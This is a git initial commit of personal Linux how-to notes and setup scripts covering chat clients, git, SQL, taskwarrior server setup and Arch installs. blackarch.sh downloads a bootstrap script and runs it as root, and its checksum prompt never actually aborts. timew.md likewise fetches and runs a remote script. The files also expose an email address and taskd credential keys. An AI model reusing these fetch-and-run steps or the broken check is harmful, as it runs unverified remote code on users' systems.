initial commit

This commit is contained in:
Malin Freeborn 2020-01-02 01:04:35 +01:00
commit 6befc5d3c1
162 changed files with 19086 additions and 0 deletions

9
README.md Normal file
View File

@ -0,0 +1,9 @@
This repository started as personal notes, and it's growing into short guides.
# Purpose
1. Minimal theory, maximum practical.
2. The statements should go in order of how likely they are to be used: if `git add` has to be used by everyone, then it should go first.
3. The scripts should get someone up and running in the shortest possible time.
4. No explanations for the program. This isn't an introduction, it's a guide for someone who already wants to use it.

10
chat/irssi.md Normal file
View File

@ -0,0 +1,10 @@
> /NETWORK LIST
> /CHANNEL LIST
> /connect chat.freenode.net
> /set nick ghast
> /join #hklbgd
> /leave #lkj

22
chat/jitsi.md Normal file
View File

@ -0,0 +1,22 @@
# Install Java OpenJDK
> sudo add-apt-repository ppa:openjdk-r/ppa
> sudo apt install openjdk-8-jre-headless -y
# Check Java Version
> java -version
This should be at least 1.8.
# NGingx
> sudo apt install nginx -y
This has missing dependencies.
> sudo apt install nginx-full
> clean; sudo apt -yf install

31
chat/khard.md Normal file
View File

@ -0,0 +1,31 @@
Short list
> khard list
Longer list
> khard show
Show from addressbook 'work'
> khard list -a work
Make a new contact in address book 'family'
> khard new -a family
> khard edit grampa
> khard remove bob
Move contact 'nina' from 'work' to 'home' address book.
> khard move -a home nina -A work
## Advanced
Merge:
> khard merge [-a source_abook] [-u uid|search terms [search terms ...]] [-A target_abook] [-U target_uid|-t target_search_terms]

10
chat/neomutt.md Normal file
View File

@ -0,0 +1,10 @@
See version information, plus current options:
> neomutt -v
Install notmuch, then run:
> notmuch setup

50
chat/profanity.md Normal file
View File

@ -0,0 +1,50 @@
# Pre Setup
Sign up to an account somewhere.
# Starting
> profanity
> /help ui theme
> theme load batman
# OTR
Install libotr-dev or libotr5-dev or whatever..
> sudo apt -y install lib5otr-dev
Make your otr keys.
> /otr gen
Then you can start an otr converstation.
> /otr start bob@jobbies.org
Or if you already havea conversation windows open, switch to otr using:
> /otr
Finally, verify!
/otr question "Who the fuck are you?" bob
Bob is verified upon the answer, 'bob'.
# Finger Prints
Get yours with
> /otr myfp
> /otr theirfp
> /otr myfp
# omemo
Cannot find anyone for this on Arch Wiki, problem is therefore impossible.

18
chat/wgetpaste.md Normal file
View File

@ -0,0 +1,18 @@
See available pastebins:
> wgetpaste -S
Upload script.sh to bpaste:
> wgetpaste -s bpaste script.sh
Input clipboard to dpaste with the heading "Title"
> wgetpaste -s dpaste -d Title -x
Paste in the file then load the result to the right-hand clipboard:
> wgetpaste -s dpaste -X

107
data/git.md Normal file
View File

@ -0,0 +1,107 @@
# Basic Git
Move to the directory containing the project.
> git status
Add this folder (or just any dir)
> git add .
History:
> git log
# Commits
Add current changes to current config.
> git add .
Make a comment:
> git commit -m "Created service"
Type out a message:
> git commit
Push your stuff out:
> git push
Add a single line:
> git log --oneline
Get recent changes:
> git pull
# New Project
> git init
# New Machines
> git config --global user.email "malinfreeborn@tutamail.com"
> git config --global user.name "Malin Freeborn"
# Branches
To make a new branch, make sure you're up to date, then:
> git checkout -b [branchname]
Check otu all branches with
> git branch -a
Add the new branch to a git:
> git push origin [branchname]
# Tricks
## Delete All History
> git checkout --orphan temp
> git add -A
> git commit -am "release the commits!"
> git branch -D master
> git branch -m master
> git push -f origin master
Gitlab requires more changes, such as going to `settings > repository` and switching the main branch, then stripping protection.
# Subtree
The project has subdirectories sub-1,sub-2,sub-3. The first should be its own repository, but should also retain its own history.
First, we extract its history as an independent item, and make that into a seprate branch.
> git subtree split --prefix=sub-1 -b sub
If you want something a few directories deep, you can use `--prefix=sub-1/dir-2/dir-3
Then go and create a new git somewhere else:
> cd ..;mkdir sub-1;cd sub-1;git init --bare
Then go back to your initial git repo, and do the following:
git push ../subtest sub:master
Finally, you can clone this repo from your original.
> git clone ../subtest

42
data/sc-im.md Normal file
View File

@ -0,0 +1,42 @@
# Basic Commands
> H = highest part
> L = lowest part
> gg = top
> g$ = most right.
> g0 = most left.
> \ = insert middle
> > = insert left
> < = insert right
gb4 = to to cell b4
> x = delete a cell
> aa = see all text in cells
> f = format cells so you can see it.
> fl = format wider right
> fh = format smaller left
> fj = decrease decimal value
> fk = increase decimal value
# Edit
> e = edit a number
> E = edit text
> dc = delete column
> yc = yank column
> dr = delete row
> p = literal paste
> Pc = paste mutatis mutandis
#Functions
> =@avg(B1:B4) = average B1 to B4
> =@max(B1:B4) = maximum of those numbers
> =@min(B1:B8) = minimumof those numbers

10
data/sdcv.md Normal file
View File

@ -0,0 +1,10 @@
# Install new dictionaries
If the path doesn't exist then:
> sudo mkdir -p /usr/share/stardict/dic
Then move the dictionaries there.

1009
data/sql/person.sql Normal file

File diff suppressed because it is too large Load Diff

354
data/sql/postgresql.md Normal file
View File

@ -0,0 +1,354 @@
# Setup
Install postgres and start it as a service, then start with:
> psql
## Make a database as the new user postgres
> sudo su postgres
> [postgres] echo $HOME
> [postgres]
> [postgres] CREATE DATABASE dvdrental;
## Sample Data
Get sample data.
> wget http://www.postgresqltutorial.com/wp-content/uploads/2019/05/dvdrental.zip
And then get the pdf mapping the sample data:
> wget http://www.postgresqltutorial.com/wp-content/uploads/2018/03/printable-postgresql-sample-database-diagram.pdf
Unzip and load sample data:
> unzip dvdrental.zip
> sudo su postgres
> [postgres] $ pg_restore -U postgres -d dvdrental dvdrental.tar
> [postgres]
# Commands
## Basics
List available databases.
> \l
You'll see a list of available databases like:
`dnd`
`dvdrentals`
Then you can connect to one:
> \c dvdrental
And have a look at what tables it has:
> \d dvdrental
If it has tables such as `language`, `film_actor` and `inventory`, you can see the table's settings with:
> \dt film_actor
And pull back the entire table:
> SELECT * from film_actor;
## Various
Connect to 231.13.48.38 with user 'bob', port 1234, database 'X'
> psql -h 231.13.48.38 -p1234 -U bob X
# Setup Yourself
Make database "test" and connect to it.
> CREATE DATABASE test;
> \l test
Delete database 'dogs':
> DROP DATABASE dogs;
Making a table has a basic form of:
`CREATE TABLE table_name (`
then [ column name ] + [data type ] ... (and possibly data constraints)
`)`
|Data Types | Meaning | Constraints |
|:----|:----|:----|
| BIGSERIAL | A number incrementing by one each entry | 'NOT NULL PRIMARY KEY (so it's used for relational reference) |
| int | integer | (50) limits the table to 50, e.g. `int(50)`|
| VARCHAR | any characters | limit, e.g.`VARCHAR(70)`|
| TIMESTAMP | time | |
| date | date | |
| text | text? | |
| tsquery | text search query | |
| money | money | |
| json | textual JSON data | |
| cidr | ipv4 or 6 address | |
| macaddr | mac address | |
E.g.
```
CREATE TABLE character (
id int,
str int(1),
dex int(1),
spd int(1),
int int(1),
wts int(1),
cha int(1));
```
See your table:
> \d
Look at what columns you have there:
> \d character
But this allows for empty characters, so...
```
CREATE TABLE person (
id BIGSERIAL NOT NULL PRIMARY KEY,
first_name VARCHAR(50) NOT NULL,
last_name VARCHAR(50) NOT NULL,
last_name VARCHAR(50) NOT NULL,
gender VARCHAR(7) NOT NULL,
date_of_birth DATE NOT NULL,
);
```
Delete with
> DROP TABLE person;
## Inserting Data
```
INSERT INTO person (
first_name,
last_name,
gender,
date_of_birth)
VALUES ('Hugi','Smith','DWARF', date '200-01-12');
```
## Selecting Data
You can also mass select by choosing to insert a file. Download example data [here](https://mockaroo.com/).
> \i /home/ghost/file.sql
Various querries:
> SELECT * FROM person;
> SELECT * FROM person ORDER BY id DESC;
> SELECT * FROM person
## Offset, Fetch and Limit
'Limit' is not official, but was accepted later:
> SELECT * FROM person ORDER BY country ASC LIMIT 10;
The official way to make a limit is 'FIRST 5 ROWS ONLY:
> SELECT * FROM person OFFSET 5 FETCH FIRST 5 ROWS ONLY;
> SELECT * FROM person where gender = 'Male' AND ( country_of_birth = 'Poland' OR country_of_birth = 'China');
Miss out the first 5 result with 'OFFSET 5'.
> SELECT p\* FROM PERSON WHERE gender = 'Female' AND country_of_birth = 'Kosovo' OFFSET 5;
> SELECT * FROM person OFFSET 5 FETCH FIRST 7 ROW ONLY;
## Advanced Selection
This query takes a lot of typing:
> SELECT * FROM person WHERE country_of_birth = 'China'
> OR country_of_birth = 'Kosovo'
> OR country_of_birth = 'Brazil';
You can write the same thing with less typing:
> SELECT *
> FROM person
> WHERE country_of_birth in ('China','Kosovo','Brazil');
> SELECT * FROM person
> WHERE date_of_birth
BETWEEN DATE '2018-04-10' AND '2019-01-01'
> ORDER BY date_of_birth;
### Rough Search
Similar words - we can find emails ending in '.com'.
> SELECT * FROM person
> WHERE email LIKE '%.com';
Or any gmail address:
> SELECT * FROM person
> WHERE email LIKE '%@gmail.%';
Or particular characters, where three precede 'gmail.com' and it's case insensitive:
> SELECT * FROM person
> WHERE email iLIKE '\_\_\_@gmail.com';
### Groups and Aggregates
Select all countries as a complete mess:
> SELECT country_of_birth FROM person;
Select countries with proper grouping:
> SELECT country_of_birth FROM person GROUP BY country_of_birth;
Select countries and count instances:
> SELECT country_of_birth, COUNT(\*) FROM person GROUP BY country_of_birth ORDER BY country_of_birth;
Also select a minimum number with 'having'. What you have must be before 'order by'.
> SELECT country_of_birth, COUNT(\*) FROM person GROUP BY country_of_birth HAVING COUNT(\*) > 5;
> SELECT country_of_birth, COUNT(\*) FROM person GROUP BY country_of_birth HAVING COUNT(\*) >= 10;
Other aggregates include 'max', 'min'.
Select most expensive car:
> SELECT MAX(price) FROM car;
> SELECT MIN(price) FROM car;
> SELECT AVG(price) FROM car;
We can stick items together for better grouping:
> SELECT make, model, MAX(price) FROM car GROPU BY make, model;
Select all fields from table 'car', and add a column containing another price, discounted to 90%, rounded to two decimal places.
> SELECT id,make,model,price,ROUND(price * .9, 2) from car;
Same thing, but take 10% of the price from the price.
> SELECT id,make,model,price,ROUND(price - (price * .1), 2) from car;
## Comparison
> SELECT 10 + 2^2;
> SELECT 10! * 2 - 3;
... et c.
This returns false:
> SELECT 1 = 1;
These return false:
> SELECT 2<1;
Or '1 is not equal to 1':
> SELECT 1<>1;
And with strings, 'G is not the same as g':
> SELECT 'G'<>'g';
### Car Disconts
You want to show the discounts on various cars. You check which columns are available and select all of them:
> \d car
> SELECT id,make,model,price FROM car;
## Aliases
You can change what a column name appears as with:
> select price AS original_price from car;
# Null Values
## Coalesce
You can input a series of entries, requesting the first one which is present. Here we input three entries which are 'null', and a third which is '2', so '2' is selected:
> SELECT COALESCE(null, null, 2) AS number;
When selecting column 'email' from table 'person', you can input the string 'Email not provided' if there is no email provided:
> SELECT COALESCE(email, 'Email not provided') from person;
## Nullif
Normally, devision by 0 produces an error:
> SELECT 10/ 0;
But 10 divided by 'null' produces only 'null', which is not an error.
The 'nullif' statement takes two numbers, and returns 'null' iff the numbers are the same as each other.
> select nullif(0,0)
> select nullif(10,10)
# Date
Select date:
> SELECT NOW()::DATE;
> SELECT NOW()::TIME;
or just:
> SELECT NOW();
More [here](postgresql.org/docs/11/datatype-datetime.html).
2h23m

90
data/sql/sql.md Normal file
View File

@ -0,0 +1,90 @@
MySQL, Aurora and the Maria Database work similarly, and mostly with the same commands.
MySQL requires 160 Megs of disk space.
The ontological layers go:
> Database > table > record > field
The record is a line containing multiple fields. The table contains multiple records.
## Database: RPGs
### Table: D&D
#### Columns:
| id | name | year | edition | stars |
|:--:|:-------------------|:-----|:--------|:------|
| 1 | Dungeons & Dragons | 1975 | 1 | 1 |
| 2 | Dungeons & Dragons | 1980 | 2 | 1 |
| 3 | Advanced Dungeons & Dragons | 1985 | 1 | 1 |
# Getting started
> sudo apt-get install mysql-server
You'll be asked for a password.
Log in with:
> mysql -u root -p
The -u requests a user, while -p tells it to prompt for a password.
List all databases:
> show databases;
Make a new database;
> create database creatures;
Start work on the new database:
> use creatures;
> create table stats (Strength VARCHAR(2), Speed VARCHAR(2), Dexterity(2));
This creatures a row called 'stats' within the 'creature'table' with a number of variables, all of type VARCHAR (a variable length character string).
Now you can insert data (which would normally be provided by a user via php or some-such).
> insert into stats (Strength,Speed,Dexterity) values (-1,0,+1)
Now have a look at the info:
> select * from stats
The old way to delete info by selection was:
> delete * from stats where Charisma='0'
...but now it's:
> delete from stats where Charisma='0'
Update a thing:
> update stats
> set Speed='-1',Charisma='-2'
> where Strength=0;
Leaving out the specifier 'where' means you're updating the entire database.
Control order with
> SELECT * FROM stats ORDER BY Strength;
Or for descending order, suffix 'DESC'.
> select * from stats ORDER by Date DESC;
# Resources
Try more at [w3schools](http://www.w3schools.com/sql/sql_groupby.asp).

6
data/sql/tricks.md Normal file
View File

@ -0,0 +1,6 @@
# Find data from any table
> pg_dump --data-only --inserts -U postgres your-db-name > a.tmp
> grep 'my string' a.tmp

40
data/suitecrm/suitecrm.sh Normal file
View File

@ -0,0 +1,40 @@
#!/bin/bash
[ ! -z $1 ] && sudo apt-get install -y virtualbox-guest-additions-iso
sudo apt-get -y install wget php php-{pear,cgi,common,curl,mbstring,gd,mysql,gettext,bcmath,imap,json,xml,fpm}
clear
echo 'The correct version of php should be 7.2.8 or greater.'
echo "The current version is $(php -v | grep PHP)"
sleep 5
sudo sh -c 'printf "upload_max_filesize = 20M\nmax_execution_time = 120\n" >> /etc/php.ini'
sudo apt-get install -y nginx
# Installing mariadb server
## uninstall any old versions first
## install software-properties-common if missing
sudo apt-get install -y software-properties-common
# then get the keys to the server
sudo apt-key adv --recv-keys --keyserver hkp://keyserver.ubuntu.com:80 0xF1656F24C74CD1D8
sudo add-apt-repository "deb [arch=amd64,arm64,ppc64el] http://mariadb.mirror.liquidtelecom.com/repo/10.4/ubuntu $(lsb_release -cs) main"
sudo apt -y update && sudo apt -y install mariadb-server mariadb-client
# Enter a password for the database, or if you did not get a prompt, run:
sudo mysql_secure_installation
# Then just accept defaults

30
data/taskwarrior/.no Normal file
View File

@ -0,0 +1,30 @@
setting up with:
- data at /var/taskd
- user: root
- host=localhost
- port=53589
- Organization=Andonome
- Name="Malin Freeborn"
## Next
Copy files to ~/.task
/usr/share/doc/taskd/pki/{ca.cert.pem,Malin_Freeborn.cert.pem,Malin_Freeborn.key.pem}
And run these commands:
```
Malin Freeborn must run these commands:
task config taskd.server localhost:53589
task config taskd.credentials 'Andonome/Malin Freeborn/36faa2a9-de12-4410-99d5-0bcaa5a4887a'
task config taskd.certificate ~/.task/Malin_Freeborn.cert.pem
task config taskd.key ~/.task/Malin_Freeborn.key.pem
task config taskd.ca ~/.task/ca.cert.pem
task config taskd.trust strict
task config taskd.ciphers NORMAL
```

View File

@ -0,0 +1,57 @@
#!/bin/bash
export TASKDDATA=/var/lib/taskd
echo Change CN to hostname
sleep 2
sudo vim /usr/share/doc/taskd/pki/vars
cd /usr/share/doc/taskd/pki/
sudo ./generate
mkdir -p $TASKDDATA
cp *.pem $TASKDDATA
chown -R root /var/lib/taskd
sudo cp *pem $TASKDDATA
chown -R taskd:taskd $TASKDDATA
taskd config "$user".cert=/var/lib/taskd/client.cert.pem
taskd config "$user".key=/var/lib/taskd/client.key.pem
taskd config "$(hostname)".cert=/var/lib/taskd/server.cert.pem
taskd config "$(hostname)".key=/var/lib/taskd/server.key.pem
taskd config "$(hostname)".crl=/var/lib/taskd/server.crl.pem
taskd config ca.cert=/var/lib/taskd/ca.cert.pem
taskd config --force server $(hostname):53589
systemctl start taskd
echo name a group
read group
echo name user
read user
taskd add org $group
taskd add user $group $user
./generate.client $user
echo "
taskd.server=alfred:port
taskd.credentials=$group/$user/key
taskd.certificate=~/.task/'$user'.cert.pem
taskd.key=~/.task/'$user'.key.pem
taskd.ca=~/.task/ca.cert.pem" >> /var/lib/taskd/config
tar cf $user.tar "$user"* ca.cert.pem

34
data/taskwarrior/task.md Normal file
View File

@ -0,0 +1,34 @@
# Contexts
Set three contexts by their tags:
> task context define work +sa or +hr
> task context define study +ed or +void or +rat
> task context define home -sa -hr -ed -void -rat
Change to the first context.
> task context work
Then stop.
> task context none
# Review
View list of tasks completed in the last week:
> task end.after:today-1wk completed
# Timewarrior
> timew start ed 'learn timewarrior'
> timew stop
> timew summary
> timew tags

178
data/taskwarrior/taskd.md Normal file
View File

@ -0,0 +1,178 @@
Switch to root to make things easier.
> yay -S
> export TASKDDATA=/var/lib/taskd
Edit `/usr/share/doc/taskd/pki/vars` so that ``CN'' = the hostname (IP is fine).
> cd /usr/share/doc/taskd/pki
Execute the `generate` file to generate a selfsigned certificate for the server. These will be \*.pem-files. Copy all \*.pem-files to /var/lib/taskd.
Make sure a copy of ca.cert.pem remains to generate user-certificates later.
# Taskd Configurations
> taskd config --force client.cert $TASKDDATA/client.cert.pem
> taskd config --force client.key $TASKDDATA/client.key.pem
> taskd config --force server.cert $TASKDDATA/server.cert.pem
> taskd config --force server.key $TASKDDATA/server.key.pem
> taskd config --force server.crl $TASKDDATA/server.crl.pem
> taskd config --force ca.cert $TASKDDATA/ca.cert.pem
# Change Taskd Log Location
The default is /tmp/log, which obviously you don't want.
> touch /var/log/taskd.log
> chown taskd:taskd /var/log/taskd.log
> taskd config --force log /var/log/taskd.log
Finally, set up the servername - the same one as in the certificates. Mine is ``testarch''.
> taskd config --force server testarch:9001
# Adding users
Let's add the group ``home'', then the user ``ghost'', will go in that group.
> taskd add org home
> taskd add user home ghost
`3f9e6154-25cb-4e45-88bb-45e98feef904`
> taskd add user home alfred
`4fbb319c-c493-437a-ab7a-028f5b75e522`
The user then gets a key.
Finally, make sure that taskd can read its own data>
> chown -R taskd:taskd /var/lib/taskd/orgs
... or perhaps the entire directory of /var/lib/taskd/.
Then it's back to /usr/share/doc/taskd/pki
Generate some userfiles:
> ./generate.client ghost
> ./generate.client alfred
The bob and ghost \*pem files have to be added to the given users' home directories.
# Setting up Users
> sudo apt-get install taskwarrior taskd
> task
Then move the \*pem files into the .task directory of the user.
Don't forget to add the ca.key.pem from `/usr/share/doc/taskd/pki`!
# Attempt 2
Well, none of that worked.
New info from [taskwarrior](https://gitpitch.com/GothenburgBitFactory/taskserver-setup#/1/4)
Default port = 53589
starting with
> taskd init
> taskd config server localhost:53589
View supported settings with `taskdrc`.
!!! Start with taskdctl start
Do a non-daemon version with
> taskd server --data $TASKDDATA --daemon
# Systemd Unit file
This needs to be edited for "$TASKDDATA", "$TASKDUSER", and "$TASKDGROUP".
---
Unit]
Description=Secure server providing multi-user, multi-client access to Taskwarrior data
Requires=network.target
After=network.target
Documentation=http://taskwarrior.org/docs/#taskd
[Service]
ExecStart=/usr/local/bin/taskd server --data $TASKDDATA
Type=simple
User=$TASKDUSER
Group=$TASKDGROUP
WorkingDirectory=$TASKDDATA
PrivateTmp=true
InaccessibleDirectories=/home /root /boot /opt /mnt /media
ReadOnlyDirectories=/etc /usr
[Install]
WantedBy=multi-user.target
---
Enable all this by copying the file to `/etc/systemd/system`, reload daemon, then start it.
Key for ghost:
29bd8a06-2cc0-4163-905d-6216257a3031
e29bffe0-72d8-45f2-b1f9-f29397cfab16
# Different:
$ task config taskd.certificate -- ~/.task/first_last.cert.pem
$ task config taskd.key -- ~/.task/first_last.key.pem
$ task config taskd.ca -- ~/.task/ca.cert.pem
# Trust
For troubleshooting we can set:
> taskd.trust=ignore [hostname]
> taskd.trust=allow all
> taskd.trust=strict
# User Defines Attributes - UDA
Each UDA has two to four attributes: type (numeric or string) and label are necessary:
> task config uda.THING.type {numeric,string}
> task config uda.THING.label Thg
Constrain these attributes to a comma-delineated set with:
> task config uda.THING.values brown,orange,green
You can also show how important the Attribute makes something:
> urgency.uda.THING.coefficient=2.8
# Aliases
Alias `delete' to `rm' with:
task config alias.rm delete

41
data/taskwarrior/taskd.sh Normal file
View File

@ -0,0 +1,41 @@
#!/bin/bash
export TASKDDATA=/var/lib/taskd
sudo mkdir -p $TASKDDATA
sudo chown taskd:$(whoami) $TASKDDATA
sudo chmod 775 $TASKDDATA
cp -r /usr/share/doc/taskd/pki/ $TASKDDATA
cd $TASKDDATA/pki
sed -i s/localhost/$(hostname -f)/ vars
./generate
cp client.cert.pem $TASKDDATA
cp client.key.pem $TASKDDATA
cp server.cert.pem $TASKDDATA
cp server.key.pem $TASKDDATA
cp server.crl.pem $TASKDDATA
cp ca.cert.pem $TASKDDATA
taskd config --force client.cert $TASKDDATA/client.cert.pem
taskd config --force client.key $TASKDDATA/client.key.pem
taskd config --force server.cert $TASKDDATA/server.cert.pem
taskd config --force server.key $TASKDDATA/server.key.pem
taskd config --force server.crl $TASKDDATA/server.crl.pem
taskd config --force ca.cert $TASKDDATA/ca.cert.pem
cd $TASKDDATA/..
taskd config --force log $PWD/taskd.log
taskd config --force pid.file $PWD/taskd.pid
taskd config --force server $(hostname -f):53589
taskd add org public
# 1515de89-cc81-4af6-a6a4-41c1430620b0
journalctl -u taskd

156
data/taskwarrior/timew.md Normal file
View File

@ -0,0 +1,156 @@
# Setup
Below commands mostly deal with timew alone. With taskwarrior installed as well, `locate on-modify-time`, then add it to ~/.task/hooks and make it executable.
#Summaries
Try:
> timew summary :yesterday
You can also use :week, :lastweek, :month, :quarter, :year, or a range such as:
> timew summary today to tomorrow
> timew today - tomorrow
> 2018-10-15T06:00 - 2018-10-17T06:00
Each of these can gain with the :ids tag.
# Basics
> timew start
> timew stop
> timew continue
> timew summary
> timew tags
And add ids with:
> timew summary :ids
> timew track 10am - 1pm timewarrior
> timew track 1pm for 2h walk
# Adjusting Timewarrior
First get ids.
> timew summary :ids
Then if we're looking at task @2:
> timew move @2 12:00
> timew lengthen @2 3mins
> time shorten @2 40mins
# Forgetting
> timew start 1h ago @4
Or if your action actually had a break:
> timew split @8
Or maybe not?
> timew join @4 @8
> timew @8 delete
Start at previous time
> timew start 3pm 'Read chapter 12'
> timew start 90mins ago 'Read chapter 12'
Cancel currently tracked time.
> timew cancel
# Backdated tracking
> timew untag @3
# Hints
* :quit - for automation
* :yes
* :color
* :fill - expand the time to fill out available time
* :adjust - automatically correct overlaps
* :ids - show id numbers
# Times
* :yesterday
* :day
* :week
* :month
* :quarter
* :lastweek
* :lastmonth
* :lastquarter
* :lastyear
# Mistakes
task end.after:2015-05-01 and end.before:2015-05-31 completed
task end.after:today-1wk completed
# Errors with Python3
Replace
`os.system('timew start ' + combined + ' :yes')`
with:
`os.system('timew start ' + combined.decode() + ' :yes')`
and
`os.system('timew stop ' + combined + ' :yes')`
with:
`os.system('timew stop ' + combined.decode() + ' :yes')`
# Fixing Errors
> curl -O https://taskwarrior.org/download/timew-dbcorrection.py
> python timew-dbcorrections.py

12
data/w3m.md Normal file
View File

@ -0,0 +1,12 @@
Ctrl+u to go to new url.
tab between fields.
B to go back.
o for the love of options.
T for a new tab.
'{' and '}' to change tabs.
'H' for help.

View File

@ -0,0 +1,59 @@
# Initial Setup
<!-- modified since testing
-->
Some of this needs executed as root, so it's probably easier to do the whole things as root.
> fdisk /dev/sdX
o,n,t,c
> mkfs.vfat /dev/sdX1
> mkdir boot
> mount /dev/sdX1 boot
Create and mount the ext4 filesystem:
> mkfs.ext4 /dev/sdX2
> mkdir root
> mount /dev/sdX2 root
Download and extract the root filesystem (as root, not via sudo):
> wget http://archlinuxarm.org/os/ArchLinuxARM-rpi-3-latest.tar.gz
> tar zxvf ArchLinuxARM-rpi-3-latest.tar.gz -C root
> sync
Move boot files to the first partition:
> mv root/boot/* boot
> Unmount the two partitions:
> umount boot root
echo belgradecats > /etc/hostname
echo "# /etc/hosts: static lookup table for host names
```
<ip-address> <hostname.domain.org> <hostname>
127.0.0.1 belgradecats.localdomain belgradecats
::1 belgradecats.localdomain belgradecats ip6-localhost
```
# End of file" > /etc/hosts
# Get audio on
echo dtparam=audio=on >> /boot/config.txt
pacman-key --init
pacman-key --populate archlinuxarm
pacman -Syyu base-devel git alsa-utils xf86-video-fbdev
timedatectl set-timezone Europe/Belgrade

View File

@ -0,0 +1,130 @@
Keyboard layout changed.
> ls /usr/share/kbd/keymaps/**/*.map.gz
> loadkeys uk.map.gz
Check if boot mode is UEFI
> ls /sys/firmware/efi/efivars
Without efivars, the system must boot with BIOS.
# Check network's up
> ping archlinux.org
Set system clock properly
> timedatectl set-ntp true
Check disks
> lsblk
Make partition
> fdisk -l
- Boot: 200M
- Swap: Double Ram's a nice standard.
- \/: 15G
- Home: The rest
- var: probably doesn't need a partition, but can be nice if you're
* Worried about filling up with logs.
* Intending to fill up with torrents, which land in /var/.
parted alternative
mklabel gpt
mkpart ESP fat32 1MiB 200MiB
set 1 boot on
name 1 efi
Use pacstrap to get the base install.
> mount /dev/sda3 /mnt/
> mkdir /mnt/home
> mkdir /mnt/boot
> mount /dev/sda3 /mnt/home
> mount /dev/sda1 /mnt/boot
> pacstrap /mnt base base-devl vim
Make fstab notes for new system.
> genfstab -U /mnt >> /mnt/etc/fstab
> arch-chroot /mnt
> echo 'en_GB.UTF-8' > /etc/default/locale
> pacman -Sy networkmanager grub
> grub-install --target=i386-pc /dev/sda
> grub-mkconfig -o /boot/grub/grub.cfg
set local time
> ln -sf /usr/share/zoneinfo/Europe/Belgrade /etc/localtime
Find the desired locale's and uncomment them.
> vi /etc/locale.gen
> locale-gen
Make your keyboard changes permenent with:
> vi /etc/vconsole.conf
then set: `KEYMAP=uk.map.gz`
unsure about this bit - is this name just for the loadkeys function?
make a hostname
echo pc > /etc/hostname
Set hostnames for network, or at least your own.
> vi /etc/hosts
# This should have the following, at least:
127.0.0.1 localhost
::1 localhost
127.0.1.1 [hostname].localdomain [hostname]
If the system has a permanent IP address, it should be used instead of localhost.
Ping some sites to make sure the network's working
> passwd
> exit
> umount -R /mnt
Remove retarded beep sound:
> sudo echo "blacklist pcspkr" >> /etc/modprobe.d/nobeep.conf
> rmmod pcspkr
# Fonts
sudo pacman -S ttf-hack ttf-font-awesome ttf-fira-mono

View File

@ -0,0 +1,121 @@
Commands not preceded with # or $ are lines in config files.
Keyboard layout changed.
ls /usr/share/kbd/keymaps/**/*.map.gz
loadkeys uk.map.gz
Check if boot mode is UEFI
ls /sys/firmware/efi/efivars
Without efivars, the system must boot with BIOS.
Check network is up
> ping archlinux.org
Set system clock properly
> timedatectl set-ntp true
Check disks
> lsblk
Make partition
> fdisk -l
- Boot: 200M
- Swap: 12G???
- \/: 15G
- Home: The rest
parted alternative:
> mklabel gpt
> mkpart ESP fat32 1MiB 200MiB
> set 1 boot on
> name 1 efi
Use pacstrap to get the base install.
> mount /dev/sda3 /mnt/
> mkdir /mnt/home
> mkdir /mnt/boot
> mount /dev/sda3 /mnt/home
> mount /dev/sda1 /mnt/boot
> pacstrap /mnt base base-devel vim
Make fstab notes for new system.
> genfstab -U /mnt >> /mnt/etc/fstab
> arch-chroot /mnt
echo 'en_GB.UTF-8' > /etc/default/locale
pacman -Sy networkmanager grub
> grub-install --target=i386-pc /dev/sda
> grub-mkconfig -o /boot/grub/grub.cfg
set local time
> ln -sf /usr/share/zoneinfo/Europe/Belgrade /etc/localtime
Find the desired locale's and uncomment them.
> vi /etc/locale.gen
> locale-gen
Mkae your keyboard changes permenent with:
> vi /etc/vconsole.conf
then set: `KEYMAP=uk.map.gz`
Make a hostname
> vi /etc/hostname
This should have the following:
```
::1 localhost
127.0.1.1 [hostname].localdomain [hostname]
```
If the system has a permanent IP address, it should be used instead of localhost.
Ping some sites to make sure the network's working
> passwd
> exit
> umount -R /mnt
Remove retarded beep sound
> # echo "blacklist pcspkr" > /etc/modprobe.d/nobeep.conf
> rmmod pcspkr
## Fonts
> sudo pacman -S ttf-hack ttf-font-awesome ttf-fira-mono

46
distros/arch/blackarch.md Normal file
View File

@ -0,0 +1,46 @@
## Basics
List Blackarch Packages
> sudo pacman -Sgg | grep blackarch | cut -d' ' -f2 | sort -u
Install all with
> sudo pacman -S blackarch
List availalble groups with
> sudo pacman -Sg | grep blackarch | cut -d- -f2
Install a group with
> sudo pacman blackarch-$thing
e.g.
> sudo blackarch-cracker
## Install from Source
First install blackman.
> sudo pacman -S blackman
List categories:
> blackman -l
Then install all from a category with:
> sudo blackman -p [ category ]
Or install from source with:
> sudo blackman -g [ group name]
or
> sudo blackman -i [ package ]

26
distros/arch/blackarch.sh Normal file
View File

@ -0,0 +1,26 @@
#!/bin/bash
# Just tested - working fine so far.
# update
pacman -Syyu
curl -O https://blackarch.org/strap.sh
sh="$(sha1sum strap.sh)"
echo "Does $sh equal 9f770789df3b7803105e5fbc19212889674cd503 ?"
read ent
if [ ! $(echo $ent | grep -c y ) ] ; then
echo bye
exit 1
fi
chmod +x strap.sh
./strap.sh
echo Finished

94
distros/arch/encrypted.md Normal file
View File

@ -0,0 +1,94 @@
> # taken from https://0x00sec.org/t/arch-linux-with-lvm-on-luks-dm-crypt-disk-encryption-installation-guide-legacy-bios-system/1479
> # if you need wifi
> wifi-menu
> timedatectl set-ntp true
> fdisk -l
> parted /dev/sda
> (parted) mklabel msdos
> (parted) mkpart primary ext2 1MB 512MB
> (parted) mkpart primary ext4 512MB 100%
> (parted) print
> (parted) set 1 boot on
> (parted) quit
> fdisk -l
> cryptsetup luksFormat /dev/sda2
> # make a name. Here I use "crypt".
cryptsetup open /dev/sda2 crypt
> pvcreate /dev/mapper/crypt
> # now a group name - "usb"
> vgcreate usb /dev/mapper/crypt
> lvcreate -L 8GB usb -n swap
> lvcreaate -L 30G usb -n root
> lvcreate -l 100%FREE usb -n home
> mkfs.ext4 /dev/mapper/usb-home
mkfs.ext4 /dev/mapper/usb-root
> mkswap /dev/mapper/usb-swap
> mkfs.ext2 /dev/sda1
> mount /dev/mapper/usb-root /mnt
mkdir /mnt/home
> mount /dev/mapper/usb-home /mnt/home
mkdir /mnt/boot
> mount /dev/sda1 /mnt/boot
swapon /dev/mapper/usb-swap
pacstrap -i /mnt base base-devel efibootmgr grub
genfstab -U /mnt >> /mnt/etc/fstab
arch-chroot /mnt
############ new root #############
ln -sf /usr/share/zoneinfo/Europe/Belgrade /etc/localtime
# uncomment en_GT.UTF-8
> vi /etc/locale.gen
> locale-gen
> # add `LANG=en_GB.UTF-8` to /etc/locale.conf
> vi /etc/locale.conf
